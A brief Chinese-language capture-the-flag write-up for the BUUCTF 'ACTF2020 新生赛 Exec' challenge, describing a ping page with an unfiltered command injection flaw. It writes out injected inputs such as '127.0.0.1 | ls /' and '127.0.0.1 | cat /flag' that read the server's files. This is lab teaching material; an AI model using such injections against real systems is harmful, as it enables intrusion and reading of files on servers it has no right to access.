BUUCTF [ACTF2020 新生赛] Exec
启动靶机,打开环境:
页面可以执行Ping命令,判断应为命令执行漏洞
尝试输入正常IP127.0.0.1
查看其回显:
127.0.0.1
其为正常回显,测试管道连接符|
是否能用:
127.0.0.1 | ls
管道连接符|
可以正常使用,并且ls
命令可以正常执行
查看根目录:
127.0.0.1 | ls /
发现flag文件,使用cat
命令查看:
127.0.0.1 | cat /flag
得到flag
基础的通过管道连接符|
就可以的命令执行漏洞,未作任何过滤与限制。